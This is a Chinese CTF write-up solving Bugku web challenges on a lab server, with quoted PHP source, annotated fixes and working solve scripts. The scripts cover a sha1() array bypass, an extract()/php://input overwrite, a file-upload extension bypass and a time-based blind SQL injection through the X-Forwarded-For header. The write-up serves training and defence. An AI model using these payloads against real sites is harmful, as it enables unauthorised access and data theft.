你从哪里来
http://123.206.87.240:9009/from.php
加上Referer:https://www.google.com 必须要https,我之前尝试http怎么也出不来flag
flag{bug-ku_ai_admin}
md5 collision(NUPT_CTF)
http://123.206.87.240:9009/md5.php
莫名其妙的题,输入一个 md5 值以 0e 开头、后面全是数字的字符串(PHP 弱类型 == 比较时会按科学计数法当作 0,于是与另一个这样的值相等),就得到flag了,http://123.206.87.240:9009/md5.php?a=s878926199a
flag{md5_collision_is_easy}
程序员本地网站
http://123.206.87.240:8002/localhost/
请从本地访问
设置headers X-Forwarded-For:127.0.0.1 就得到flag了
flag{loc-al-h-o-st1}
各种绕过
各种绕过哟
http://123.206.87.240:8002/web7/
代码审计题,代码如下:
<?php
// Challenge source (quoted verbatim). The flag is released on a comparison
// that attacker-controlled inputs can satisfy without knowing any secret;
// the notes below mark each weak spot and the server-side fix.
highlight_file('flag.php');
// Second decode of an already-decoded query parameter: a double-URL-encoded
// value reaches the 'margin' comparison below as plain text.
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
// Loose (==) comparison of two untrusted values. Both may be arrays
// (uname[] / passwd[]); arrays with different contents are "not equal",
// so this gate does not stop the array trick used in the writeup.
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
// sha1() on a non-string argument does not produce a hash: PHP 7 emits a
// warning and returns NULL, so NULL === NULL satisfies the strict comparison
// without any collision (PHP 8 throws a TypeError instead). Note '&' is
// bitwise AND, not '&&'; '===' and '==' bind tighter, so it still yields 1
// only when both sides are true. Fix: require is_string() on both inputs
// before hashing and compare with hash_equals() against a stored credential.
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
}
?>
考点在 sha1($_GET['uname']) === sha1($_POST['passwd']):传入的两个参数不能相等,但 sha1() 后的值需要全等。利用 sha1() 处理数组时返回 false 而不是哈希值的特性,两边都传数组即可绕过,解题脚本如下:
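# -*- coding:utf-8 -*-
import requests

if __name__ == '__main__':
    # Solve script for web7 (indentation restored; the page had it flattened).
    # Both inputs are sent as arrays (uname[] in the query string, passwd[] in
    # the POST body). They differ, so the == gate passes, and sha1() on an
    # array yields no hash (NULL with a warning on PHP 7), so the strict
    # comparison holds as NULL === NULL. id=margin satisfies the last check.
    # Server-side fix: reject non-string input with is_string() before hashing.
    url = 'http://123.206.87.240:8002/web7/?uname[]=&id=margin'
    response = requests.post(url, data={"passwd[]": "1"})
    print(response.text)
flag{HACK_45hhs_213sDD}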
web8
txt????
http://123.206.87.240:8002/web8/
<?php
// Challenge source (quoted verbatim). extract($_GET) registers every query
// parameter as a local variable, so the client picks the values of $ac and
// $fn (and could overwrite any other variable of the same name) — the
// variable-overwrite bug the writeup exploits. $flag is not set in this
// snippet; presumably it comes from an included file.
extract($_GET);
if (!empty($ac))
{
// $fn is attacker-controlled and goes straight to file_get_contents(): any
// readable local path or stream wrapper (the writeup uses php://input, which
// returns the request body) becomes the value compared against $ac.
// Fix: do not extract() request data; read $_GET['ac'] explicitly and
// allow-list the file name.
$f = trim(file_get_contents($fn));
// Strict comparison, but both sides are chosen by the same client.
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
变量覆盖漏洞(extract($_GET) 把请求参数直接注册成变量,$ac 和 $fn 都可由请求控制),解题脚本如下:
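# -*- coding:utf-8 -*-
import requests

if __name__ == '__main__':
    # Solve script for web8 (the page had the whole script collapsed onto one
    # line, which made it a single comment). extract($_GET) lets the request
    # set both $ac and $fn; fn=php://input makes file_get_contents() read the
    # POST body ('1'), which then strictly equals ac=1.
    # Server-side fix: drop extract() and allow-list the file name.
    url = 'http://123.206.87.240:8002/web8/?ac=1&fn=php://input'
    response = requests.post(url, data='1')
    print(response.text)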
flag{3cfb7a90fc0de31}
细心
地址:http://123.206.87.240:8002/web13/
想办法变成admin
首页显示404,扫描一下目录,有robots.txt文件,访问resusl.php,提示要输入密码,随便输入测试一下,最后输入admin得到flag
flag(ctf_0098_lkji-s)
求getshell
求getshell
http://123.206.87.240:8002/web9/
文件上传绕过,使用burpsuite拦截请求,并修改header中的Content-Type,改一下大小写,然后修改文件后缀名为php2, php3, php4, php5, phps, pht, phtm, phtml,一个一个测试,最终php5成功。
POST /web9/index.php HTTP/1.1
Host: 123.206.87.240:8002
Content-Length: 426
Cache-Control: max-age=0
Origin: http://123.206.87.240:8002
Upgrade-Insecure-Requests: 1
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryFIpHkQ8rB2zpCR8U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://123.206.87.240:8002/web9/
Accept-Language: zh-CN,zh;q=0.9,und;q=0.8
Connection: close

------WebKitFormBoundaryFIpHkQ8rB2zpCR8U
Content-Disposition: form-data; name="file"; filename="QQ截图20190817094816.php5"
Content-Type: image/png

PNG webshell
------WebKitFormBoundaryFIpHkQ8rB2zpCR8U
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryFIpHkQ8rB2zpCR8U--
KEY{bb35dc123820e}
INSERT INTO注入
题目:
地址:http://123.206.87.240:8002/web15/
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
// Challenge source (quoted verbatim; the opening <?php tag is not shown on
// the page). Errors are silenced, so a failed query gives no visible
// feedback — which is why the writeup resorts to a time-based (sleep) blind
// injection instead of an error-based one.
error_reporting(0);
// Returns the client IP, preferring the client-supplied X-Forwarded-For
// header over REMOTE_ADDR, so the value is fully attacker-controlled.
// Only the text before the first comma is kept; that is the "comma filter"
// the writeup works around. It is not validation — any comma-free string
// passes through unchanged.
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
// Legacy mysql_* API (removed in PHP 7): no prepared statements available.
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
// Echoed without escaping as well, so the same header is also an HTML
// injection sink besides the SQL one below.
echo 'your ip is :'.$ip;
// SQL injection: the header value is interpolated straight into the INSERT.
// Fix: validate with filter_var($ip, FILTER_VALIDATE_IP) and bind the value
// through a prepared statement (mysqli/PDO); alert on X-Forwarded-For values
// that are not IP literals.
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
解答:
题目提供了源码,由于 error_reporting(0) 关掉了报错,只能通过 sleep 做时间盲注;但 getIp() 用 explode(',', $ip) 只取第一段,相当于过滤了逗号(,),所以注入语句里不能出现逗号(用 substr(x from i for 1) 代替 substr(x,i,1)),解题脚本如下:
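# -*- coding:utf-8 -*-
import requests

if __name__ == '__main__':
    # Solve script for web15 (indentation restored; the page had it flattened).
    # Time-based blind SQL injection through the X-Forwarded-For header, which
    # the server interpolates into an INSERT. Each request tests one character
    # of the target value: the payload sleeps 3 s when the guess is right, so a
    # response that took 3-4 s counts as a hit. No comma appears in the SQL
    # because getIp() keeps only the text before the first comma, hence
    # substr(x from i for 1) instead of substr(x, i, 1).
    # The three commented-out loops below recover the database, table and
    # column names the same way; only the last loop is live.
    # Server-side fix: FILTER_VALIDATE_IP on the header and a prepared
    # statement. Detection: log X-Forwarded-For values that are not IP
    # literals, and watch for bursts of ~3 s responses from one client.
    # url = 'http://123.206.87.240:8002/web15/'
    # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
    # database = ''
    # flag = 1
    # for i in range(1, 10):
    # for j in allString:
    # header = {
    # "X-Forwarded-For": "1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#" % (
    # i, ord(j))
    # }
    # r = requests.get(url, headers=header)
    # t = r.elapsed.total_seconds()
    # # print('the time of ' + j + ' is ' + str(t))
    # if t >= 3:
    # database = database + j
    # print('the ' + str(i) + ' place of database is ' + j)
    # break
    # elif t < 3 and j == 'M':
    # flag = 0
    # break
    # if flag == 0:
    # break
    # print('database:', database) #web15
    # url = 'http://123.206.87.240:8002/web15/'
    # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
    # table_name = ''
    # flag = 1
    # for i in range(1, 20):
    # for j in allString:
    # header = {
    # "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(3) else 0 end))#" % (
    # i, ord(j))
    # }
    # r = requests.get(url, headers=header)
    # t = r.elapsed.total_seconds()
    # #print('the time of ' + j + ' is ' + str(t))
    # if t >= 3 and t < 4:
    # table_name = table_name + j
    # print('the ' + str(i) + ' place of table_name is ' + j)
    # break
    # elif t < 3 and j == 'M':
    # flag = 0
    # break
    # if flag == 0:
    # break
    # print('table_name:', table_name)#flag
    # url = 'http://123.206.87.240:8002/web15/'
    # allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
    # column_name = ''
    # flag = 1
    # for i in range(1, 20):
    # for j in allString:
    # header = {
    # "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % (
    # i, ord(j))
    # }
    # r = requests.get(url, headers=header)
    # t = r.elapsed.total_seconds()
    # #print('the time of ' + j + ' is ' + str(t))
    # if t >= 3 and t < 4:
    # column_name = column_name + j
    # print('the ' + str(i) + ' place of table_name is ' + j)
    # break
    # elif t < 3 and j == 'M':
    # flag = 0
    # break
    # if flag == 0:
    # break
    # print('column_name:', column_name)
    url = 'http://123.206.87.240:8002/web15/'
    # Raw string: the original literal contained "\," which is an invalid escape
    # sequence (SyntaxWarning on Python 3.12+); the characters are unchanged.
    allString = r'''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
    flag = ''
    f = 1
    for i in range(1,30):
        for j in allString:
            header = {
                "X-Forwarded-For":"1'+(select case when (ascii(substr((select flag from flag) from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
            }
            r = requests.get(url,headers=header)
            # Round-trip time is the only feedback channel (errors are silenced).
            t = r.elapsed.total_seconds()
            #print('the time of '+j+' is '+str(t))
            if t >= 3 and t < 4:
                flag = flag + j
                # Message fixed: this loop extracts the flag, not table_name.
                print('the '+str(i)+' place of flag is '+j)
                break
            elif t < 3 and j == 'M':
                # 'M' is the last character of allString: no candidate matched,
                # so the value has ended (or the sleep did not register).
                f = 0
                break
        if f == 0 :
            break
    print('flag:',flag)
flag{cdbf14c9551d5be5612f7bb5d2867853}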
这是一个神奇的登陆框
题目:
http://123.206.87.240:9001/sql/
flag格式flag{}
解题:
打开就是一个登录页面,用bp抓包,放到sqlmap中跑,直接能跑出注入点
POST /sql/ HTTP/1.1
Host: 123.206.87.240:9001
Content-Length: 52
Cache-Control: max-age=0
Origin: http://123.206.87.240:9001
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://123.206.87.240:9001/sql/
Accept-Language: zh-CN,zh;q=0.9,und;q=0.8
Cookie: isadmin=false
Connection: close

admin_name=admin&admin_passwd=123456&submit=GO+GO+GO
flag{ed6b28e684817d9efcaf802979e57aea}